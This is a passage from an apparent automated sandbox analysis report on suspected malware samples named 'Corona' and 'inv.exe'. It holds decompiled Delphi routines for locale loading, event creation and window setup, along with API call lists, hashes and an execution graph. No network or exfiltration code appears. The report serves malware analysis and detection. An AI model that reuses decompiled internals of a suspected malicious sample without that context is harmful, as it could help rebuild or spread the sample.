                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromPoint
                                  • API String ID: 1792783759-1072306578
                                  • Opcode ID: 2cd439debc2a3bb0771d99a607a824d329674d1c28e170ba9df1a5298749d0dd
                                  • Instruction ID: 1ad67605cc98717139eb0004534b250f25e609a20d43c3ff9b92442721e631d0
                                  • Opcode Fuzzy Hash: 2cd439debc2a3bb0771d99a607a824d329674d1c28e170ba9df1a5298749d0dd
                                  • Instruction Fuzzy Hash: A7018F71301228ABDB009F55ED44B5EBBA5EB4575AF80403BE9549B212C3BCDE408B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C864, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E0040C864(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403420(_t6, _t21);
				}
				_t20 = _t6;
				E004030CC(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030CC(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E00403478(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









                                  0x0040c864
                                  0x0040c868
                                  0x0040c86a
                                  0x0040c86d
                                  0x0040c86d
                                  0x0040c874
                                  0x0040c87a
                                  0x0040c87f
                                  0x0040c893
                                  0x0040c8a3
                                  0x0040c8a6
                                  0x0040c8b9
                                  0x0040c8bc
                                  0x0040c8c0
                                  0x0040c8c2
                                  0x0040c8c7
                                  0x0040c8ce
                                  0x0040c8d5

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,0041A3A5,00000000,0041A3F9), ref: 0040C88E
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,0041A3A5,00000000,0041A3F9), ref: 0040C89E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateEvent
                                  • String ID: \w@
                                  • API String ID: 2692171526-2353373287
                                  • Opcode ID: 4be5b0d99eb6ae5c1ea7c0c11a51e7c670ef50e421a95afa341d92b7ab8ea73d
                                  • Instruction ID: 7dbfc5fa140a02088513aafb2787570eb5b7ad859c87eaf5cc78bfc5b4a25fa4
                                  • Opcode Fuzzy Hash: 4be5b0d99eb6ae5c1ea7c0c11a51e7c670ef50e421a95afa341d92b7ab8ea73d
                                  • Instruction Fuzzy Hash: 1BF02231381B019BE230FF298C42B067A90AF01B75F24473AB1A8BF3D5D739A904079D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: inv.exe PID: 7092 Parent PID: 6616 inv.exeCOMMON

                                  Execution Graph

                                  Execution Coverage:2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:381
                                  Total number of Limit Nodes:13

                                  Graph

                                  execution_graph 28574 44c91c 28581 405bc8 GetModuleHandleA 28574->28581 28576 44c92c 28585 44b168 114 API calls 28576->28585 28578 44c944 28586 403d20 7 API calls 28578->28586 28582 405bfb 28581->28582 28587 403b58 28582->28587 28584 405c07 28584->28576 28585->28578 28588 403b8b 28587->28588 28591 403af8 28588->28591 28592 403b34 28591->28592 28593 403b07 28591->28593 28592->28584 28593->28592 28597 404e34 28593->28597 28601 4372cc 28593->28601 28615 4026bc 28593->28615 28598 404e44 GetModuleFileNameA 28597->28598 28599 404e60 28597->28599 28621 405070 GetModuleFileNameA RegOpenKeyExA 28598->28621 28599->28593 28602 4372e6 GetVersion 28601->28602 28603 437344 28601->28603 28640 437098 GetCurrentProcessId 28602->28640 28603->28593 28607 43730a 28672 412e00 58 API calls 28607->28672 28609 437314 28673 412dac 58 API calls 28609->28673 28611 437324 28674 412dac 58 API calls 28611->28674 28613 437334 28675 412dac 58 API calls 28613->28675 28616 4026c1 28615->28616 28619 4026d4 28615->28619 28903 4020e8 28616->28903 28617 4026c7 28617->28619 28914 4027cc 11 API calls 28617->28914 28619->28593 28622 4050f3 28621->28622 28623 4050b3 RegOpenKeyExA 28621->28623 28639 404eb8 12 API calls 28622->28639 28623->28622 28624 4050d1 RegOpenKeyExA 28623->28624 28624->28622 28626 40517c lstrcpyn GetThreadLocale GetLocaleInfoA 28624->28626 28628 4051b3 28626->28628 28629 405296 28626->28629 28627 405118 RegQueryValueExA 28630 405138 RegQueryValueExA 28627->28630 28631 405156 RegCloseKey 28627->28631 28628->28629 28633 4051c3 lstrlen 28628->28633 28629->28599 28630->28631 28631->28599 28634 4051db 28633->28634 28634->28629 28635 405200 lstrcpyn LoadLibraryExA 28634->28635 28636 405228 28634->28636 28635->28636 28636->28629 28637 405232 lstrcpyn LoadLibraryExA 28636->28637 28637->28629 28638 405264 lstrcpyn LoadLibraryExA 28637->28638 28638->28629 28639->28627 28676 4087f0 28640->28676 28644 4370e1 28645 4370eb GlobalAddAtomA GetCurrentThreadId 28644->28645 28646 4087f0 56 API calls 28645->28646 28647 437125 28646->28647 28648 403e64 25 API calls 28647->28648 28649 437132 28648->28649 28650 43713c GlobalAddAtomA 28649->28650 28685 4042d0 28650->28685 28654 437169 28691 436c9c 28654->28691 28656 437173 28699 436ac4 28656->28699 28658 43717f 28703 448b2c 28658->28703 28660 437192 28720 449c10 28660->28720 28662 4371a8 28734 412eec 58 API calls 28662->28734 28664 4371d2 GetModuleHandleA 28665 4371f2 28664->28665 28666 4371e2 GetProcAddress 28664->28666 28735 403e10 28665->28735 28666->28665 28669 403e10 11 API calls 28670 43720f 28669->28670 28671 412d60 58 API calls 28670->28671 28671->28607 28672->28609 28673->28611 28674->28613 28675->28603 28739 408804 28676->28739 28679 403e64 28680 403e68 28679->28680 28683 403e78 28679->28683 28680->28683 28757 403ed4 25 API calls 28680->28757 28681 403ea6 28681->28644 28683->28681 28758 4026dc 11 API calls 28683->28758 28686 4042d4 RegisterClipboardFormatA 28685->28686 28687 413738 28686->28687 28688 41373e 28687->28688 28689 413753 RtlInitializeCriticalSection 28688->28689 28690 413768 28689->28690 28690->28654 28692 436cb0 SetErrorMode 28691->28692 28693 436e09 28691->28693 28694 436cf0 28692->28694 28695 436cd4 GetModuleHandleA GetProcAddress 28692->28695 28693->28656 28696 436deb SetErrorMode 28694->28696 28697 436cfd LoadLibraryA 28694->28697 28695->28694 28696->28656 28697->28696 28698 436d19 10 API calls 28697->28698 28698->28696 28700 436aca 28699->28700 28759 436c38 28700->28759 28702 436b38 28702->28658 28704 448b36 28703->28704 28795 418ec4 28704->28795 28706 448b4c 28799 448ee8 LoadCursorA 28706->28799 28709 448b85 28710 448bc1 72E7AC50 72E7AD70 72E7B380 28709->28710 28711 448bf7 28710->28711 28804 41bd2c 28711->28804 28713 448c03 28714 41bd2c 27 API calls 28713->28714 28715 448c15 28714->28715 28716 41bd2c 27 API calls 28715->28716 28717 448c27 28716->28717 28808 449308 28717->28808 28719 448c34 28719->28660 28721 449c1f 28720->28721 28722 418ec4 56 API calls 28721->28722 28723 449c35 28722->28723 28724 449ce0 LoadIconA 28723->28724 28848 4210b0 28724->28848 28726 449d03 GetModuleFileNameA OemToCharA 28727 449d4c 28726->28727 28728 449d72 CharLowerA 28727->28728 28729 449d95 28728->28729 28730 449da6 28729->28730 28850 449f18 28729->28850 28874 44bbdc 11 API calls 28730->28874 28733 449dc8 28733->28662 28734->28664 28736 403e31 28735->28736 28737 403e16 28735->28737 28736->28669 28737->28736 28902 4026dc 11 API calls 28737->28902 28740 408828 28739->28740 28742 408853 28740->28742 28752 4083f8 56 API calls 28740->28752 28743 408868 28742->28743 28744 4088ab 28742->28744 28746 4088a1 28743->28746 28748 403e10 11 API calls 28743->28748 28753 40445c 25 API calls 28743->28753 28754 4083f8 56 API calls 28743->28754 28756 403f00 25 API calls 28744->28756 28755 40445c 25 API calls 28746->28755 28748->28743 28749 4087ff 28749->28679 28752->28742 28753->28743 28754->28743 28755->28749 28756->28749 28757->28683 28758->28681 28760 436c47 28759->28760 28762 436c40 28759->28762 28772 436b9c 28760->28772 28764 436c83 SendMessageA 28762->28764 28765 436c72 SystemParametersInfoA 28762->28765 28770 436c45 28762->28770 28764->28770 28765->28770 28766 436c54 28775 436be8 6 API calls 28766->28775 28767 436c5d 28776 436bb8 SystemParametersInfoA 28767->28776 28770->28702 28771 436c64 28771->28702 28777 421c20 28772->28777 28775->28770 28776->28771 28778 421c30 28777->28778 28781 421c50 28777->28781 28784 421b38 28778->28784 28782 421c87 28781->28782 28783 421c81 GetSystemMetrics 28781->28783 28782->28766 28782->28767 28783->28782 28789 421b4e 28784->28789 28785 403e10 11 API calls 28786 421bf6 KiUserCallbackDispatcher 28785->28786 28786->28782 28787 421ba9 28790 421bb1 GetProcAddress 28787->28790 28788 421bc1 28788->28785 28789->28787 28789->28788 28791 421b38 11 API calls 28789->28791 28790->28788 28792 421b93 28791->28792 28792->28787 28793 421ba1 28792->28793 28794 403e10 11 API calls 28793->28794 28794->28787 28796 418ecb 28795->28796 28797 418eee 28796->28797 28826 41907c 56 API calls 28796->28826 28797->28706 28802 448f07 28799->28802 28800 448f20 LoadCursorA 28827 448fa0 28800->28827 28802->28800 28803 448b6f GetKeyboardLayout 28802->28803 28803->28709 28805 41bd32 28804->28805 28830 41b270 28805->28830 28807 41bd54 28807->28713 28810 449321 28808->28810 28809 449352 SystemParametersInfoA 28811 449365 CreateFontIndirectA 28809->28811 28812 44937d GetStockObject 28809->28812 28810->28809 28840 41c0bc 28811->28840 28813 41c0bc 30 API calls 28812->28813 28815 449391 SystemParametersInfoA 28813->28815 28817 4493e5 28815->28817 28818 4493b1 CreateFontIndirectA 28815->28818 28845 41c1a0 30 API calls 28817->28845 28819 41c0bc 30 API calls 28818->28819 28821 4493ca CreateFontIndirectA 28819->28821 28823 41c0bc 30 API calls 28821->28823 28822 4493f5 GetStockObject 28824 41c0bc 30 API calls 28822->28824 28825 4493e3 28823->28825 28824->28825 28825->28719 28826->28797 28828 4026bc 25 API calls 28827->28828 28829 448fb3 28828->28829 28829->28802 28831 41b28b 28830->28831 28838 41b258 RtlEnterCriticalSection 28831->28838 28833 41b295 28834 4026bc 25 API calls 28833->28834 28835 41b2f2 28833->28835 28834->28835 28839 41b264 RtlLeaveCriticalSection 28835->28839 28837 41b343 28837->28807 28838->28833 28839->28837 28846 41bc78 GetObjectA 28840->28846 28842 41c0ce 28847 41beb0 29 API calls 28842->28847 28844 41c0d7 28844->28815 28845->28822 28846->28842 28847->28844 28849 4210bc 28848->28849 28849->28726 28851 449f41 28850->28851 28852 44a0a3 28850->28852 28851->28852 28875 419f54 28851->28875 28853 403e10 11 API calls 28852->28853 28855 44a0b8 28853->28855 28855->28730 28856 449f5a GetClassInfoA 28857 449f80 RegisterClassA 28856->28857 28862 449fb5 28856->28862 28858 449f99 28857->28858 28857->28862 28887 405910 56 API calls 28858->28887 28860 449fa6 28888 40b070 25 API calls 28860->28888 28878 406728 28862->28878 28864 44a00c 28865 403e10 11 API calls 28864->28865 28866 44a01a SetWindowLongA 28865->28866 28867 44a065 GetSystemMenu DeleteMenu DeleteMenu 28866->28867 28868 44a03a 28866->28868 28867->28852 28870 44a096 DeleteMenu 28867->28870 28882 44ab9c 28868->28882 28870->28852 28872 44ab9c 63 API calls 28873 44a059 SetClassLongA 28872->28873 28873->28867 28874->28733 28876 419f64 VirtualAlloc 28875->28876 28877 419f92 28875->28877 28876->28877 28877->28856 28889 402908 28878->28889 28880 40673b CreateWindowExA 28881 406773 28880->28881 28881->28864 28890 420e1c 28882->28890 28885 44a041 SendMessageA 28885->28872 28886 44abab LoadIconA 28886->28885 28887->28860 28888->28862 28889->28880 28893 420e58 28890->28893 28894 420e68 28893->28894 28897 420e26 28893->28897 28895 415390 56 API calls 28894->28895 28894->28897 28896 420e87 28895->28896 28896->28897 28898 420ea1 28896->28898 28899 420e94 28896->28899 28897->28885 28897->28886 28900 41db84 62 API calls 28898->28900 28901 41d03c 56 API calls 28899->28901 28900->28897 28901->28897 28902->28736 28904 402101 28903->28904 28905 4020fc 28903->28905 28907 40210d 28904->28907 28908 40212e RtlEnterCriticalSection 28904->28908 28909 402138 28904->28909 28915 4019fc RtlInitializeCriticalSection 28905->28915 28907->28617 28908->28909 28909->28907 28922 401ff4 28909->28922 28912 402263 28912->28617 28913 402259 RtlLeaveCriticalSection 28913->28912 28914->28619 28916 401a20 RtlEnterCriticalSection 28915->28916 28917 401a2a 28915->28917 28916->28917 28918 401a48 LocalAlloc 28917->28918 28919 401a62 28918->28919 28920 401ab1 28919->28920 28921 401aa7 RtlLeaveCriticalSection 28919->28921 28920->28904 28921->28920 28925 402004 28922->28925 28923 402030 28927 402054 28923->28927 28933 401e08 9 API calls 28923->28933 28925->28923 28925->28927 28928 401f68 28925->28928 28927->28912 28927->28913 28934 4017bc 28928->28934 28930 401f78 28932 401f85 28930->28932 28943 401edc 9 API calls 28930->28943 28932->28925 28933->28927 28937 4017d8 28934->28937 28936 4017e2 28944 4016a8 28936->28944 28937->28936 28940 4017ee 28937->28940 28941 401833 28937->28941 28948 401514 28937->28948 28956 401410 LocalAlloc 28937->28956 28940->28930 28957 4015f0 VirtualFree 28941->28957 28943->28932 28946 4016ee 28944->28946 28945 40171e 28945->28940 28946->28945 28947 40170a VirtualAlloc 28946->28947 28947->28945 28947->28946 28949 401523 VirtualAlloc 28948->28949 28951 401550 28949->28951 28952 401573 28949->28952 28958 4013c8 LocalAlloc 28951->28958 28952->28937 28954 40155c 28954->28952 28955 401560 VirtualFree 28954->28955 28955->28952 28956->28937 28957->28940 28958->28954 28959 419f2c 28962 44a498 28959->28962 28960 419f42 28963 44a500 28962->28963 28969 44a4ce 28962->28969 29046 44a34c 28963->29046 28965 44a50b 28967 44a5c9 28965->28967 28968 44a51b 28965->28968 28970 44a5d0 28967->28970 28971 44a61f 28967->28971 28972 44aa67 28968->28972 28973 44a521 28968->28973 28969->28963 29042 44a4ef 28969->29042 29054 413524 56 API calls 28969->29054 28974 44a5d6 28970->28974 29002 44a93f 28970->29002 28980 44aa81 28971->28980 28981 44a62c 28971->28981 28986 44a5ad 28971->28986 29066 44b538 12 API calls 28972->29066 28978 44a595 28973->28978 28979 44a5b2 28973->28979 28973->28986 28973->29042 28976 44a606 28974->28976 28977 44a5dd 28974->28977 28976->28986 28996 44a91d 28976->28996 28976->29042 28993 44a661 28977->28993 28994 44a5ea 28977->28994 28977->29042 28987 44ab0b 28978->28987 28988 44a59b 28978->28988 28989 44a6f7 28979->28989 28990 44a5bb 28979->28990 28982 44aaa2 28980->28982 28983 44aa8a 28980->28983 28984 44a637 28981->28984 28985 44aa28 IsIconic 28981->28985 29068 44b0d4 57 API calls 28982->29068 29067 44b078 26 API calls 28983->29067 28984->28972 28984->28986 28997 44aa3c GetFocus 28985->28997 28985->29042 28986->29042 29053 44a410 NtdllDefWindowProc_A 28986->29053 29071 44a410 NtdllDefWindowProc_A 28987->29071 28998 44a5a4 28988->28998 28999 44aae5 28988->28999 29001 44ab9c 63 API calls 28989->29001 28990->28986 29000 44a848 28990->29000 29005 44a673 28993->29005 29006 44a67c 28993->29006 28994->28986 29003 44a800 SendMessageA 28994->29003 29062 44af50 IsWindowEnabled 28996->29062 29007 44aa4d 28997->29007 28997->29042 28998->28986 29008 44a72b 28998->29008 29004 436c38 23 API calls 28999->29004 29020 44a876 29000->29020 29000->29042 29001->29042 29018 44a965 IsWindowEnabled 29002->29018 29002->29042 29003->29042 29011 44aaf7 29004->29011 29012 44a689 29005->29012 29013 44a67a 29005->29013 29055 44abb8 70 API calls 29006->29055 29065 4422d0 GetCurrentThreadId 72E7AC10 29007->29065 29058 44a410 NtdllDefWindowProc_A 29008->29058 29069 44a3a4 11 API calls 29011->29069 29056 44ac68 67 API calls 29012->29056 29057 44a410 NtdllDefWindowProc_A 29013->29057 29017 44a731 29023 44a770 29017->29023 29024 44a74e 29017->29024 29025 44a973 29018->29025 29018->29042 29061 40ca1c SetErrorMode LoadLibraryA 29020->29061 29022 44aa54 29029 44aa5c SetFocus 29022->29029 29022->29042 29060 44a2a0 62 API calls 29023->29060 29059 44a2b0 57 API calls 29024->29059 29036 44a97a IsWindowVisible 29025->29036 29026 44ab02 29070 44a410 NtdllDefWindowProc_A 29026->29070 29029->29042 29033 44a885 29037 44a8d4 GetLastError 29033->29037 29038 44a894 GetProcAddress 29033->29038 29034 44a756 PostMessageA 29034->29042 29035 44a778 PostMessageA 29035->29042 29039 44a988 GetFocus 29036->29039 29036->29042 29037->29042 29040 44a8bc 29038->29040 29038->29042 29063 4325a4 29039->29063 29040->29042 29042->28960 29043 44a99d SetFocus 29064 42d05c 29043->29064 29045 44a9bc SetFocus 29045->29042 29047 44a35f 29046->29047 29048 44a389 29047->29048 29049 44a379 29047->29049 29050 44a36a SetThreadLocale 29047->29050 29048->28965 29049->29048 29052 449308 38 API calls 29049->29052 29072 40c074 74 API calls 29050->29072 29052->29048 29053->29042 29054->28969 29055->29042 29056->29042 29057->29042 29058->29017 29059->29034 29060->29035 29061->29033 29062->29042 29063->29043 29064->29045 29065->29022 29066->29040 29067->29040 29068->29040 29069->29026 29070->29042 29071->29042 29072->29049

                                  Executed Functions

                                  Function 00405070, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 65%
                                  			E00405070(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x405175);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404EB8( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E004052DC, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E0040517C);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401294();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L0040129C();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401294();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401294();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401294();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                  0x00405071
                                  0x00405073
                                  0x0040507b
                                  0x0040508c
                                  0x00405091
                                  0x004050aa
                                  0x004050b1
                                  0x004050f3
                                  0x004050f5
                                  0x004050f6
                                  0x004050fb
                                  0x004050fe
                                  0x00405101
                                  0x00405113
                                  0x00405136
                                  0x00405156
                                  0x00405156
                                  0x0040515a
                                  0x00405160
                                  0x00405163
                                  0x00405166
                                  0x00405174
                                  0x004050b3
                                  0x004050c8
                                  0x004050cf
                                  0x00000000
                                  0x004050d1
                                  0x004050e6
                                  0x004050ed
                                  0x0040517c
                                  0x00405184
                                  0x0040518b
                                  0x0040518c
                                  0x0040519f
                                  0x004051a4
                                  0x004051ad
                                  0x004051c3
                                  0x004051c9
                                  0x004051ca
                                  0x004051d7
                                  0x004051dc
                                  0x004051db
                                  0x004051db
                                  0x004051eb
                                  0x004051f3
                                  0x004051f9
                                  0x004051fe
                                  0x0040520b
                                  0x0040520f
                                  0x00405210
                                  0x00405211
                                  0x00405226
                                  0x00405226
                                  0x0040522a
                                  0x00405243
                                  0x00405247
                                  0x00405248
                                  0x00405249
                                  0x00405259
                                  0x0040525e
                                  0x00405262
                                  0x00405264
                                  0x00405279
                                  0x0040527d
                                  0x0040527e
                                  0x0040527f
                                  0x0040528f
                                  0x00405294
                                  0x00405294
                                  0x00405262
                                  0x0040522a
                                  0x004051f3
                                  0x0040529d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004050ed
                                  0x004050cf

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0044D0A4,?,00404E60,00400000,?,00000105,00000001,00410240,00404E9C,00405940,0000FF9D,?), ref: 0040508C
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0044D0A4,?,00404E60,00400000,?,00000105,00000001), ref: 004050AA
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0044D0A4), ref: 004050C8
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 004050E6
                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040512F
                                  • RegQueryValueExA.ADVAPI32(?,004052DC,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405175,?,80000001), ref: 0040514D
                                  • RegCloseKey.ADVAPI32(?,0040517C,00000000,00000000,00000005,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040516F
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 0040518C
                                  • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405199
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040519F
                                  • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004051CA
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405211
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405221
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405249
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405259
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 0040527F
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 0040528F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1759228003-2375825460
                                  • Opcode ID: 42a30e681b9837cf28251fe46fb58e67a43e287ec18316ee78b63dbc1ce4251d
                                  • Instruction ID: bf47fbb6f7454da76762217b8018c12124681cb01ce2ce31bf4c900d15f1e550
                                  • Opcode Fuzzy Hash: 42a30e681b9837cf28251fe46fb58e67a43e287ec18316ee78b63dbc1ce4251d
                                  • Instruction Fuzzy Hash: BF515371A4064D7AEB21E6A49C46FEF77ACDB04744F4001FABA04F62C1D67C9E448FA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044A498, Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 401COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 25 44a498-44a4cc 26 44a500-44a515 call 44a34c 25->26 27 44a4ce-44a4cf 25->27 32 44a5c9-44a5ce 26->32 33 44a51b 26->33 28 44a4d1-44a4ed call 413524 27->28 59 44a4fc-44a4fe 28->59 60 44a4ef-44a4f7 28->60 35 44a5d0 32->35 36 44a61f-44a624 32->36 37 44aa67-44aa7c call 44b538 33->37 38 44a521-44a524 33->38 39 44a5d6-44a5db 35->39 40 44a93f-44a947 35->40 43 44a645-44a64a 36->43 44 44a626 36->44 50 44ab48-44ab50 37->50 41 44a526 38->41 42 44a590-44a593 38->42 51 44a606-44a60b 39->51 52 44a5dd 39->52 49 44a94d-44a958 call 4325a4 40->49 40->50 53 44a82c-44a833 41->53 54 44a52c-44a52f 41->54 55 44a595 42->55 56 44a5b2-44a5b5 42->56 47 44a650-44a656 43->47 48 44aaba-44aac1 43->48 57 44aa81-44aa88 44->57 58 44a62c-44a631 44->58 75 44a8fc-44a918 call 44c464 47->75 76 44a65c 47->76 68 44aad4-44aae3 48->68 69 44aac3-44aad2 48->69 49->50 105 44a95e-44a96d call 4325a4 IsWindowEnabled 49->105 67 44ab67-44ab6d 50->67 70 44aa00-44aa0b 51->70 71 44a611-44a614 51->71 65 44a5e3-44a5e8 52->65 66 44a9d8-44a9e3 52->66 53->50 72 44a839-44a843 53->72 77 44a535 54->77 78 44ab41-44ab42 call 44a410 54->78 79 44ab0b-44ab1c call 449950 call 44a410 55->79 80 44a59b-44a59e 55->80 81 44a6f7-44a705 call 